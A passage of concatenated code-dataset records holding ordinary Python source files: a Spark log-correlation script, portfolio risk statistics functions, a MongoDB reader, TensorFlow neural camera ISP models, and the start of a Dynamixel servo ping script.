log_corr.groupBy(log_corr['host']).agg(fu.count(log_corr['bytes']).alias('x'),fu.sum(log_corr['bytes']).alias('y'))\n all_vals = x_y.withColumn('for_n', x_y['x']/x_y['x']).withColumn('x^2', x_y['x']**2).withColumn('y^2', x_y['y']**2).withColumn('x*y', x_y['x']*x_y['y']).drop(x_y['host'])\n corr = all_vals.groupBy().sum()\n r = corr.withColumn('r',corr_coeff(corr))\n r_sq = r.withColumn('r^2',r['r']**2)\n to_out = r_sq.select('r','r^2')\n toOut = list(to_out.collect()[0])\n print(\"r = \",toOut[0],\"\\nr^2 = \",toOut[1])\n\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName('spark cassandra')\n sc = SparkContext(conf=conf)\n assert sc.version >= '2.3' # make sure we have Spark 2.3+\n keyspace = sys.argv[1]\n table = sys.argv[2]\n main(keyspace,table)\n","repo_name":"sachinnpraburaj/Big-Data-Programming-1","sub_path":"19. Logs Correlation Cassandra/correlate_logs_cassandra.py","file_name":"correlate_logs_cassandra.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19564456804","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef skewness(r):\n \"\"\"\n Alternative to scipy.stats.skew()\n Computes the skewness of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**3).mean()\n return exp/sigma_r**3\n\n\ndef kurtosis(r):\n \"\"\"\n Alternative to scipy.stats.kurtosis()\n Computes the kurtosis of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**4).mean()\n return exp/sigma_r**4\n\ndef compound(r):\n \"\"\"\n returns the result of compounding the set of returns in r\n \"\"\"\n return np.expm1(np.log1p(r).sum()) \n\ndef annualize_rets(r, periods_per_year):\n \"\"\"\n Annualizes a set of returns\n We should infer the periods per year\n but that is currently left as an exercise\n to the reader :-)\n \"\"\"\n compounded_growth = (1+r).prod()\n n_periods = r.shape[0]\n return compounded_growth**(periods_per_year/n_periods)-1\n\n\ndef annualize_vol(r, periods_per_year):\n \"\"\"\n Annualizes the vol of a set of returns\n We should infer the periods per year\n but that is currently left as an exercise\n to the reader :-)\n \"\"\"\n return r.std()*(periods_per_year**0.5)\n\n\ndef sharpe_ratio(r, riskfree_rate, periods_per_year):\n \"\"\"\n Computes the annualized sharpe ratio of a set of returns\n \"\"\"\n # convert the annual riskfree rate to per period\n rf_per_period = (1+riskfree_rate)**(1/periods_per_year)-1\n excess_ret = r - rf_per_period\n ann_ex_ret = annualize_rets(excess_ret, periods_per_year)\n ann_vol = annualize_vol(r, periods_per_year)\n return ann_ex_ret/ann_vol\n\nimport scipy.stats\ndef is_normal(r, level=0.01):\n \"\"\"\n Applies the Jarque-Bera test to determine if a Series is normal or not\n Test is applied at the 1% level by default\n Returns True if the hypothesis of normality is accepted, False otherwise\n \"\"\"\n if isinstance(r, pd.DataFrame):\n return r.aggregate(is_normal)\n else:\n statistic, p_value = scipy.stats.jarque_bera(r)\n return p_value > level\n \ndef drawdown(return_series: pd.Series):\n \"\"\"Takes a time series of asset returns.\n returns a DataFrame with columns for\n the wealth index, \n the previous peaks, and \n the percentage drawdown\n \"\"\"\n wealth_index = 1000*(1+return_series).cumprod()\n previous_peaks = wealth_index.cummax()\n drawdowns = (wealth_index - previous_peaks)/previous_peaks\n return pd.DataFrame({\"Wealth\": wealth_index, \n \"Previous Peak\": previous_peaks, \n \"Drawdown\": drawdowns})\ndef semideviation(r):\n \"\"\"\n Returns the semideviation aka negative semideviation of r\n r must be a Series or a DataFrame, else raises a TypeError\n \"\"\"\n if isinstance(r, pd.Series):\n is_negative = r < 0\n return r[is_negative].std(ddof=0)\n elif isinstance(r, pd.DataFrame):\n return r.aggregate(semideviation)\n else:\n raise TypeError(\"Expected r to be a Series or DataFrame\")\n\n\ndef var_historic(r, level=5):\n \"\"\"\n Returns the historic Value at Risk at a specified level\n i.e. returns the number such that \"level\" percent of the returns\n fall below that number, and the (100-level) percent are above\n \"\"\"\n if isinstance(r, pd.DataFrame):\n return r.aggregate(var_historic, level=level)\n elif isinstance(r, pd.Series):\n return -np.percentile(r, level)\n else:\n raise TypeError(\"Expected r to be a Series or DataFrame\")\n\n\ndef cvar_historic(r, level=5):\n \"\"\"\n Computes the Conditional VaR of Series or DataFrame\n \"\"\"\n if isinstance(r, pd.Series):\n is_beyond = r <= var_historic(r, level=level)\n return -r[is_beyond].mean()\n elif isinstance(r, pd.DataFrame):\n return r.aggregate(cvar_historic, level=level)\n else:\n raise TypeError(\"Expected r to be a Series or DataFrame\")\n\n\nfrom scipy.stats import norm\ndef var_gaussian(r, level=5, modified=False):\n \"\"\"\n Returns the Parametric Gauusian VaR of a Series or DataFrame\n If \"modified\" is True, then the modified VaR is returned,\n using the Cornish-Fisher modification\n \"\"\"\n # compute the Z score assuming it was Gaussian\n z = norm.ppf(level/100)\n if modified:\n # modify the Z score based on observed skewness and kurtosis\n s = skewness(r)\n k = kurtosis(r)\n z = (z +\n (z**2 - 1)*s/6 +\n (z**3 -3*z)*(k-3)/24 -\n (2*z**3 - 5*z)*(s**2)/36\n )\n return -(r.mean() + z*r.std(ddof=0))\ndef summary_stats(r, riskfree_rate=0.03):\n \"\"\"\n Return a DataFrame that contains aggregated summary stats for the returns in the columns of r\n \"\"\"\n ann_r = r.aggregate(annualize_rets, periods_per_year=12)\n ann_vol = r.aggregate(annualize_vol, periods_per_year=12)\n ann_sr = r.aggregate(sharpe_ratio, riskfree_rate=riskfree_rate, periods_per_year=12)\n dd = r.aggregate(lambda r: drawdown(r).Drawdown.min())\n skew = r.aggregate(skewness)\n kurt = r.aggregate(kurtosis)\n cf_var5 = r.aggregate(var_gaussian, modified=True)\n hist_cvar5 = r.aggregate(cvar_historic)\n return pd.DataFrame({\n \"Annualized Return\": ann_r,\n \"Annualized Vol\": ann_vol,\n \"Skewness\": skew,\n \"Kurtosis\": kurt,\n \"Cornish-Fisher VaR (5%)\": cf_var5,\n \"Historic CVaR (5%)\": hist_cvar5,\n \"Sharpe Ratio\": ann_sr,\n \"Max Drawdown\": dd\n })","repo_name":"rishubhkhurana/MLFinance","sub_path":"erktoolkit/erk/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14117527497","text":"from pymongo import MongoClient\n\ndef main ():\n\n # Connection to the MongoDB Server\n mongoClient = MongoClient ('127.0.0.1:27017')\n # Connection to the database\n db = mongoClient.data_visual\n #Collection\n collection = db.Oil_Production\n\n Oil_Production_JSON = list(collection.find())\n\n print(Oil_Production_JSON)\n\nif __name__ == \"__main__\":\n main ()\n","repo_name":"Matthew-Jeffery/Web-Class-Projects","sub_path":"flaskr/mongo_read.py","file_name":"mongo_read.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4143268239","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImplementation of classic and neural image signal processors. The module provides:\n\n- an abstract NIPModel class that sets up a common framework for ISP models\n- Several neural ISPs: INet, DNet, UNet\n- A trivial ONet model which serves as a NULL-ISP (allows to pass RGB-RGB pairs through the pipeline),\n- A ClassicISP class with a standard ISP (standard steps + neural demosaicing)\n\n\"\"\"\nimport os\nimport sys\nimport json\nimport inspect\nimport numpy as np\nimport tensorflow as tf\n\nfrom collections import OrderedDict\n\nimport helpers.raw\nfrom models.tfmodel import TFModel\nfrom models import layers\nfrom helpers import tf_helpers, paramspec, utils\nfrom helpers.kernels import upsampling_kernel, gamma_kernels, bilin_kernel\n\n\nclass NIPModel(TFModel):\n \"\"\"\n Abstract class for implementing neural imaging pipelines. Specific classes are expected to \n implement the 'construct_model' method that builds the model. See existing classes for examples.\n \"\"\"\n\n def __init__(self, loss_metric='L2', patch_size=None, in_channels=4, **kwargs):\n \"\"\"\n Base constructor with common setup.\n\n :param loss_metric: loss metric for NIP optimization (L2, L1, SSIM)\n :param patch_size: Optionally patch size can be given to fix placeholder dimensions (can be None)\n :param in_channels: number of channels in the input RAW image (defaults to 4 for RGGB)\n :param kwargs: Additional arguments for specific NIP implementations\n \"\"\"\n super().__init__()\n self.x = tf.keras.Input(dtype=tf.float32, shape=(patch_size, patch_size, in_channels), name='x')\n self.in_channels = in_channels\n self.construct_model(**kwargs)\n self._has_attributes(['y', '_model'])\n\n # Configure loss and model optimization\n self.loss_metric = loss_metric\n self.construct_loss(loss_metric)\n self.optimizer = tf.keras.optimizers.Adam()\n\n def construct_loss(self, loss_metric):\n if loss_metric == 'L2':\n self.loss = tf_helpers.mse \n elif loss_metric == 'L1':\n self.loss = tf_helpers.mae\n elif loss_metric == 'SSIM':\n self.loss = tf_helpers.ssim_loss\n elif loss_metric == 'MS-SSIM':\n self.loss = tf_helpers.msssim_loss\n else:\n raise ValueError('Unsupported loss metric!')\n\n def construct_model(self):\n \"\"\"\n Constructs the NIP model. The model should be a tf.keras.Model instance available via the\n self._model attribute. The method should use self.x as RAW image input, and set self.y as \n the model output. The output is expected to be clipped to [0,1]. For better optimization \n stability, it's better not to backpropagate through clipping:\n\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y])\n \"\"\"\n raise NotImplementedError()\n\n @tf.function\n def training_step(self, batch_x, batch_y, learning_rate=None):\n \"\"\"\n Make a single training step and return the loss.\n \"\"\"\n with tf.GradientTape() as tape:\n batch_Y = self._model(batch_x)\n loss = self.loss(batch_Y, batch_y)\n\n if learning_rate is not None: self.optimizer.lr.assign(learning_rate)\n grads = tape.gradient(loss, self._model.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self._model.trainable_weights))\n\n return loss\n \n def process(self, batch_x, training=False):\n \"\"\"\n Develop RAW input and return RGB image.\n \"\"\"\n if batch_x.ndim == 3:\n batch_x = np.expand_dims(batch_x, 0)\n \n return self._model(batch_x, training)\n \n def reset_performance_stats(self):\n self.performance = {\n 'loss': {'training': [], 'validation': []},\n 'psnr': {'validation': []},\n 'ssim': {'validation': []},\n }\n\n def get_hyperparameters(self):\n p = {'in_channels': self.in_channels}\n if hasattr(self, '_h'):\n p.update(self._h.to_json())\n return p\n\n @property\n def _input_description(self):\n return utils.format_patch_shape(self.patch_size_raw)\n\n @property\n def _output_description(self):\n return utils.format_patch_shape(self.patch_size_rgb)\n\n @property\n def patch_size_raw(self):\n return self.x.shape[1:] if hasattr(self.y, 'shape') else None\n\n @property\n def patch_size_rgb(self):\n return self.y.shape[1:] if hasattr(self.y, 'shape') else None\n\n def summary(self):\n return '{:s} : {} -> {}'.format(super().summary(), self._input_description, self._output_description)\n\n def load_model(self, dirname):\n if '/' not in dirname:\n dirname = os.path.join('data/models/nip', dirname)\n super().load_model(dirname)\n\n def save_model(self, dirname, epoch=0, quiet=False):\n if '/' not in dirname:\n dirname = os.path.join('data/models/nip', dirname)\n super().save_model(dirname, epoch=epoch, quiet=quiet)\n\n def process_fingerprint(self, k0, demosaicing=True, cfa_pattern=None):\n \"\"\" \n Map a RAW-level camera fingerprint to RGB space either via (1) CFA-informed pixel mapping or (2) demosaicing.\n \n (2) will be more suitable for standard PRNU detection, while (1) may be more applicable for further processing,\n e.g., in CNN-based models. \n \"\"\"\n \n try:\n default_cfa = self._h.cfa_pattern\n except:\n default_cfa = None\n\n cfa_pattern = cfa_pattern or default_cfa\n\n if cfa_pattern is None:\n raise ValueError('This ISP is not aware of the CFA! Set the CFA explicitly or make sure \"._h.cfa_pattern\" is accessible!')\n\n k0m = helpers.raw.merge_bayer(k0, cfa_pattern)\n \n if demosaicing:\n return self._model._demosaicing(np.expand_dims(k0m, axis=0), clip=False).numpy()\n else:\n return k0m.sum(-1)\n\n\nclass UNet(NIPModel):\n \"\"\"\n The UNet model, rewritten from scratch for TF 2.x\n Originally adapted from https://github.com/cchen156/Learning-to-See-in-the-Dark\n \"\"\"\n \n def construct_model(self, **kwargs):\n # Define and validate hyper-parameters\n self._h = paramspec.ParamSpec({\n 'n_steps': (5, int, (2, 6)),\n 'activation': ('leaky_relu', str, set(tf_helpers.activation_mapping.keys()))\n })\n\n self._h.update(**kwargs)\n lrelu = tf_helpers.activation_mapping[self._h.activation]\n \n _layers = OrderedDict()\n _tensors = OrderedDict()\n _tensors['ep0'] = self.x\n\n # Construct the encoder\n for n in range(1, self._h.n_steps + 1):\n _layers['ec{}1'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(n-1), [3, 3], activation=lrelu, padding='SAME')\n _layers['ec{}2'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(n-1), [3, 3], activation=lrelu, padding='SAME')\n _tensors['ec{}1'.format(n)] = _layers['ec{}1'.format(n)](_tensors['ep{}'.format(n-1)])\n _tensors['ec{}2'.format(n)] = _layers['ec{}2'.format(n)](_tensors['ec{}1'.format(n)])\n\n if n < self._h.n_steps:\n _layers['ep{}'.format(n)] = tf.keras.layers.MaxPool2D([2, 2], padding='SAME')\n _tensors['ep{}'.format(n)] = _layers['ep{}'.format(n)](_tensors['ec{}2'.format(n)])\n \n # Easy access to encoder output via a recursive relation\n _tensors['dc02'] = _tensors['ec{}2'.format(self._h.n_steps)]\n\n # Construct the decoder\n for n in range(1, self._h.n_steps):\n _layers['dct{}'.format(n)] = tf.keras.layers.Conv2DTranspose(32 * 2**(self._h.n_steps - n - 1), [2, 2], [2, 2], padding='SAME')\n _layers['dcat{}'.format(n)] = tf.keras.layers.Concatenate()\n _layers['dc{}1'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(self._h.n_steps - n - 1), [3, 3], activation=lrelu, padding='SAME')\n _layers['dc{}2'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(self._h.n_steps - n - 1), [3, 3], activation=lrelu, padding='SAME')\n\n _tensors['dct{}'.format(n)] = _layers['dct{}'.format(n)](_tensors['dc{}2'.format(n-1)])\n _tensors['dcat{}'.format(n)] = _layers['dcat{}'.format(n)]([_tensors['dct{}'.format(n)], _tensors['ec{}2'.format(self._h.n_steps - n)]])\n _tensors['dc{}1'.format(n)] = _layers['dc{}1'.format(n)](_tensors['dcat{}'.format(n)])\n _tensors['dc{}2'.format(n)] = _layers['dc{}2'.format(n)](_tensors['dc{}1'.format(n)])\n\n # Final step to render the RGB image\n _layers['dc{}'.format(self._h.n_steps)] = tf.keras.layers.Conv2D(12, [3, 3], padding='SAME')\n _tensors['dc{}'.format(self._h.n_steps)] =_layers['dc{}'.format(self._h.n_steps)](_tensors['dc{}2'.format(self._h.n_steps - 1)])\n _tensors['dts'] = tf.nn.depth_to_space(_tensors['dc{}'.format(self._h.n_steps)], 2)\n\n # Add NIP outputs\n y = _tensors['dts']\n # self.y = tf.clip_by_value(_tensors['dts'], 0, 1)\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n\n # Construct the Keras model\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y], name='unet')\n\n @property\n def model_code(self):\n return f'{self.class_name}_{self._h.n_steps}'\n\n\nclass INet(NIPModel):\n \"\"\"\n A neural pipeline which replicates the steps of a standard imaging pipeline.\n \"\"\"\n \n def construct_model(self, random_init=False, kernel=5, trainable_upsampling=False, cfa_pattern='gbrg'):\n \n self._h = paramspec.ParamSpec({\n 'random_init': (False, bool, None),\n 'kernel': (5, int, (3, 11)),\n 'trainable_upsampling': (False, bool, None),\n 'cfa_pattern': ('gbrg', str, {'gbrg', 'rggb', 'bggr'})\n })\n params = locals()\n self._h.update(**{k: params[k] for k in self._h.keys() if k in params})\n\n # Initialize the upsampling kernel\n upk = upsampling_kernel(self._h.cfa_pattern)\n\n if self._h.random_init:\n # upk = np.random.normal(0, 0.1, (4, 12))\n dmf = np.random.normal(0, 0.1, (self._h.kernel, self._h.kernel, 3, 3))\n gamma_d1k = np.random.normal(0, 0.1, (3, 12))\n gamma_d1b = np.zeros((12, ))\n gamma_d2k = np.random.normal(0, 0.1, (12, 3))\n gamma_d2b = np.zeros((3,))\n srgbk = np.eye(3)\n else: \n # Prepare demosaicing kernels (bilinear)\n dmf = bilin_kernel(self._h.kernel)\n\n # Prepare gamma correction kernels (obtained from a pre-trained toy model)\n gamma_d1k, gamma_d1b, gamma_d2k, gamma_d2b = gamma_kernels()\n\n # Example sRGB conversion table\n srgbk = np.array([[ 1.82691061, -0.65497452, -0.17193617],\n [-0.00683982, 1.33216381, -0.32532394],\n [ 0.06269717, -0.40055895, 1.33786178]]).transpose()\n\n # Up-sample the input back the full resolution\n h12 = tf.keras.layers.Conv2D(12, 1, kernel_initializer=tf.constant_initializer(upk), use_bias=False, activation=None, trainable=self._h.trainable_upsampling)(self.x)\n\n # Demosaicing\n pad = (self._h.kernel - 1) // 2\n bayer = tf.nn.depth_to_space(h12, 2)\n bayer = tf.pad(bayer, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n rgb = tf.keras.layers.Conv2D(3, self._h.kernel, kernel_initializer=tf.constant_initializer(dmf), use_bias=False, activation=None, padding='VALID')(bayer)\n\n # Color space conversion\n srgb = tf.keras.layers.Conv2D(3, 1, kernel_initializer=tf.constant_initializer(srgbk), use_bias=False, activation=None)(rgb,)\n\n # Gamma correction\n rgb_g0 = tf.keras.layers.Conv2D(12, 1, kernel_initializer=tf.constant_initializer(gamma_d1k), bias_initializer=tf.constant_initializer(gamma_d1b), use_bias=True, activation=tf.keras.activations.tanh)(srgb)\n y = tf.keras.layers.Conv2D(3, 1, kernel_initializer=tf.constant_initializer(gamma_d2k), bias_initializer=tf.constant_initializer(gamma_d2b), use_bias=True, activation=None)(rgb_g0)\n \n # self.y = tf.clip_by_value(self.yy, 0, 1, name='{}/y'.format(self.scoped_name))\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y])\n\n @property\n def model_code(self):\n return '{c}_{cfa}{tu}{r}_{k}x{k}'.format(c=self.class_name, cfa=self._h.cfa_pattern, k=self._h.kernel, \n tu='T' if self._h.trainable_upsampling else '', r='R' if self._h.random_init else '')\n\n\nclass DNet(NIPModel):\n \"\"\"\n Neural imaging pipeline adapted from a joint demosaicing-&-denoising model:\n Gharbi, Michaël, et al. \"Deep joint demosaicking and denoising.\" ACM Transactions on Graphics (TOG) 35.6 (2016): 191.\n \"\"\"\n\n def construct_model(self, n_layers=15, kernel=3, n_features=64):\n\n self._h = paramspec.ParamSpec({\n 'n_layers': (15, int, (1, 32)),\n 'kernel': (3, int, (3, 11)),\n 'n_features': (64, int, (4, 128)),\n })\n params = locals()\n self._h.update(**{k: params[k] for k in self._h.keys() if k in params})\n\n k_initializer = tf.keras.initializers.VarianceScaling\n\n # Initialize the upsampling kernel\n upk = upsampling_kernel()\n\n # Padding size\n pad = (self._h.kernel - 1) // 2\n\n # Convolutions on the sub-sampled input tensor\n deep_x = self.x\n for r in range(self._h.n_layers):\n deep_y = tf.keras.layers.Conv2D(12 if r == self._h.n_layers - 1 else self._h.n_features, self._h.kernel, activation=tf.keras.activations.relu, padding='VALID', kernel_initializer=k_initializer)(deep_x)\n deep_x = tf.pad(deep_y, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n\n # Up-sample the input\n h12 = tf.keras.layers.Conv2D(12, 1, kernel_initializer=tf.constant_initializer(upk), use_bias=False, activation=None, trainable=False)(self.x)\n bayer = tf.nn.depth_to_space(h12, 2)\n\n # Upscale the conv. features and concatenate with the input RGB channels\n features = tf.nn.depth_to_space(deep_x, 2)\n bayer_features = tf.concat((features, bayer), axis=3) \n\n # Project the concatenated 6-D features (R G B bayer from input + 3 channels from convolutions)\n pu = tf.keras.layers.Conv2D(self._h.n_features, self._h.kernel, kernel_initializer=k_initializer, use_bias=True, activation=tf.keras.activations.relu, padding='VALID', bias_initializer=tf.zeros_initializer)(bayer_features)\n\n # Final 1x1 conv to project each 64-D feature vector into the RGB colorspace\n pu = tf.pad(pu, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n\n y = tf.keras.layers.Conv2D(3, 1, kernel_initializer=tf.ones_initializer, use_bias=False, activation=None, padding='VALID')(pu)\n # self.y = tf.clip_by_value(self.yy, 0, 1, name='{}/y'.format(self.scoped_name))\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y])\n\n @property\n def model_code(self):\n return '{c}_{k}x{k}_{l}x{f}f'.format(c=self.class_name, k=self._h.kernel, \n f=self._h.n_features, l=self._h.n_layers)\n\n\nclass ONet(NIPModel):\n \"\"\"\n Dummy pipeline for RGB training.\n \"\"\"\n\n def construct_model(self):\n patch_size = 2 * self.x.shape[1]\n self.x = tf.keras.Input(dtype=tf.float32, shape=(patch_size, patch_size, 3))\n self.y = tf.identity(self.x)\n self._model = tf.keras.Model(inputs=self.x, outputs=self.y)\n\n\nclass __TensorISP():\n \"\"\" \n Toy ISP implemented in Tensorflow. This class is intended for debugging and testing - for\n use in most situations, please use a more flexible 'ClassicISP' which integrates with \n the rest of the framework.\n \"\"\"\n\n def process(self, x, srgb_mat=None, cfa_pattern='gbrg', brightness='percentile'):\n\n kernel = 5\n\n # Initialize upsampling and demosaicing kernels\n upk = upsampling_kernel(cfa_pattern).reshape((1, 1, 4, 12))\n dmf = bilin_kernel(kernel)\n\n # Setup sRGB color conversion\n if srgb_mat is None:\n srgb_mat = np.eye(3)\n srgb_mat = srgb_mat.T.reshape((1, 1, 3, 3))\n\n # Demosaicing & color space conversion\n pad = (kernel - 1) // 2\n h12 = tf.nn.conv2d(x, upk, [1, 1, 1, 1], 'SAME')\n bayer = tf.nn.depth_to_space(h12, 2)\n bayer = tf.pad(bayer, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n rgb = tf.nn.conv2d(bayer, dmf, [1, 1, 1, 1], 'VALID')\n \n # RGB -> sRGB\n rgb = tf.nn.conv2d(rgb, srgb_mat, [1, 1, 1, 1], 'SAME')\n\n # Brightness correction\n if brightness is not None:\n if brightness == 'percentile':\n percentile = 0.5\n rgb -= np.percentile(rgb, percentile)\n rgb /= np.percentile(rgb, 100 - percentile)\n elif brightness == 'shift':\n mult = 0.25 / tf.reduce_mean(rgb)\n rgb *= mult\n else:\n raise ValueError('Brightness normalization not recognized!')\n\n # Gamma correction\n y = rgb\n y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n y = tf.pow(y, 1/2.2)\n \n return y\n\n\nclass _ClassicISP(tf.keras.Model):\n \"\"\"\n A flexible version of a classic camera ISP.\n \"\"\"\n\n def __init__(self, srgb_mat=None, kernel=5, c_filters=(3,), cfa_pattern='gbrg', residual=False, brightness=None, **kwargs):\n super().__init__()\n \n up = upsampling_kernel(cfa_pattern).reshape((1, 1, 4, 12)).astype(np.float32)\n self._upsampling_kernel = tf.convert_to_tensor(up)\n\n if srgb_mat is None:\n srgb_mat = np.eye(3, dtype=np.float32)\n\n self._srgb_mat = tf.convert_to_tensor(srgb_mat.T.reshape((1, 1, 3, 3)))\n self._demosaicing = layers.DemosaicingLayer(c_filters, kernel, 'leaky_relu', residual)\n self._brightness = brightness\n\n def call(self, inputs, training=False):\n h12 = tf.nn.conv2d(inputs, self._upsampling_kernel, [1, 1, 1, 1], 'SAME')\n bayer = tf.nn.depth_to_space(h12, 2)\n\n rgb = self._demosaicing(bayer)\n rgb = tf.nn.conv2d(rgb, self._srgb_mat, [1, 1, 1, 1], 'SAME')\n\n # Brightness correction\n if self._brightness == 'percentile':\n percentile = 0.5\n rgb -= np.percentile(rgb, percentile)\n rgb /= np.percentile(rgb, 100 - percentile)\n elif self._brightness == 'shift':\n mult = 0.25 / tf.reduce_mean(rgb)\n rgb *= mult\n \n # Gamma correction\n y = rgb\n y = tf.stop_gradient(tf.clip_by_value(y, 1.0/255, 1) - y) + y\n y = tf.pow(y, 1/2.2)\n return y\n\n\nclass ClassicISP(NIPModel):\n \"\"\"\n A tensorflow implementation of a simple camera ISP. The model expects RAW Bayer stacks\n with 4 channels (RGGB) as input, and replicates steps of a simple pipeline:\n\n - upsample half-resolution RGGB stacks to full-resolution RGB Bayer images\n - demosaicing (simple CNN model)\n - RGB -> sRGB color conversion (based on conversion tables from the camera)\n - [optional brightness normalization]\n - gamma correction\n\n See also: helpers.raw_api.unpack\n \"\"\"\n\n def construct_model(self, srgb_mat=None, kernel=5, c_filters=(), cfa_pattern='gbrg', residual=True, brightness=None):\n \n self._h = paramspec.ParamSpec({\n 'kernel': (5, int, (3, 11)),\n 'c_filters': ((), tuple, paramspec.numbers_in_range(int, 1, 1024)),\n 'cfa_pattern': ('gbrg', str, {'gbrg', 'rggb', 'bggr'}),\n 'residual': (True, bool, None)\n })\n params = locals()\n self._h.update(**{k: params[k] for k in self._h.keys() if k in params})\n self._model = _ClassicISP(**self._h.to_dict())\n self.y = None\n\n def set_cfa_pattern(self, cfa_pattern):\n if cfa_pattern is not None:\n cfa_pattern = cfa_pattern.lower()\n up = upsampling_kernel(cfa_pattern).reshape((1, 1, 4, 12)).astype(np.float32)\n self._model._upsampling_kernel = tf.convert_to_tensor(up)\n self._h.update(cfa_pattern=cfa_pattern)\n\n def set_srgb_conversion(self, srgb_mat):\n if srgb_mat is not None:\n srgb = srgb_mat.T.reshape((1, 1, 3, 3)).astype(np.float32)\n self._model._srgb_mat = tf.convert_to_tensor(srgb)\n\n def process(self, batch_x, training=False, cfa_pattern=None, srgb_mat=None):\n if batch_x.ndim == 3:\n batch_x = np.expand_dims(batch_x, 0)\n\n self.set_cfa_pattern(cfa_pattern)\n self.set_srgb_conversion(srgb_mat)\n return self._model(batch_x, training)\n\n @property\n def model_code(self):\n return 'ClassicISP_{cfa}_{k}x{k}_{fs}-{of}{r}'.format(fs='-'.join(['{:d}'.format(x) for x in self._h.c_filters]), of=3, k=self._h.kernel, cfa=self._h.cfa_pattern, r='R' if self._h.residual else '')\n\n def set_camera(self, camera):\n \"\"\" Sets both CFA and sRGB based on camera presets from 'config/cameras.json' \"\"\"\n with open('config/cameras.json') as f:\n cameras = json.load(f)\n self.set_cfa_pattern(cameras[camera]['cfa'])\n self.set_srgb_conversion(np.array(cameras[camera]['srgb']))\n\n @classmethod\n def restore(cls, dir_name='data/models/isp/ClassicISP_auto_3x3_32-32-32-32-3R/', *, camera=None, cfa=None, srgb=None, patch_size=128):\n isp = super().restore(dir_name)\n\n if camera is not None:\n isp.set_camera(camera)\n\n if cfa is not None:\n isp.set_cfa_pattern(cfa)\n\n if srgb is not None:\n isp.set_srgb_conversion(cfa)\n \n return isp\n\n def summary(self):\n nf = len(self._h.c_filters)\n fs = self._h.c_filters[0] if len(set(self._h.c_filters)) == 1 else '*' \n k = self._h.kernel\n return f'{self.class_name}[{self._h.cfa_pattern}] + CNN demosaicing [{nf}+1 layers : {k}x{k}x{fs} -> 1x1x3]'\n\n def summary_compact(self):\n nf = len(self._h.c_filters)\n fs = self._h.c_filters[0] if len(set(self._h.c_filters)) == 1 else '*' \n k = self._h.kernel\n return f'{self.class_name}[{self._h.cfa_pattern}, {nf}+1 conv2D {k}x{k}x{fs} > 1x1x3]'\n\n\nsupported_models = [name for name, obj in inspect.getmembers(sys.modules[__name__]) if type(obj) is type and issubclass(obj, NIPModel) and name != 'NIPModel']\n","repo_name":"pkorus/neural-imaging","sub_path":"models/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":22758,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"5"} +{"seq_id":"40526957475","text":"from __future__ import print_function\nfrom pyxl320.Packet import makePingPacket\nfrom pyxl320 import ServoSerial\n# from pyxl320 import DummySerial\nfrom pyxl320 import utils\nimport argparse\nimport time\nfrom pyxl320 import xl320\nfrom pyxl320.xl320 import ErrorStatusMsg\nfrom serial import SerialException\nimport sys\n\n\ndef packetToDict(pkt):\n\t\"\"\"\n\tGiven a packet, this turns it into a dictionary ... is this useful?\n\n\tin: packet, array of numbers\n\tout: dictionary (key, value)\n\t\"\"\"\n\n\td = {\n\t\t'id': pkt[4],\n\t\t# 'instruction': xl320.InstrToStr[pkt[7]],\n\t\t# 'length': (pkt[6] << 8) + pkt[5],\n\t\t# 'params': pkt[8:-2],\n\t\t'Model Number': (pkt[10] << 8) + pkt[9],\n\t\t'Firmware Ver': pkt[11],\n\t\t'Error': ErrorStatusMsg[pkt[8]],\n\t\t# 'crc': pkt[-2:]\n\t}\n\n\treturn d\n\n\ndef sweep(port, rate, ID, retry=3):\n\t\"\"\"\n\tSends a ping packet to ID's from 0 to maximum and prints out any returned\n\tmessages.\n\n\tActually send a broadcast and will retry (resend) the ping 3 times ...\n\t\"\"\"\n\tif port == 'dummy':\n\t\ts = ServoSerial(port, rate, fake=True)\n\telse:\n\t\ts = ServoSerial(port, rate)\n\n\tif ID < 0:\n\t\tID = xl320.XL320_BROADCAST_ADDR\n\n\ttry:\n\t\ts.open()\n\texcept SerialException as e:\n\t\t# print('Error opening serial port:')\n\t\tprint('-'*40)\n\t\tprint(sys.argv[0], ':')\n\t\tprint(e)\n\t\texit(1)\n\n\tpkt = makePingPacket(ID)\n\t# print('ping', pkt)\n\ts.write(pkt)\n\n\t# as more servos add up, I might need to increase the cnt number???\n\tfor cnt in 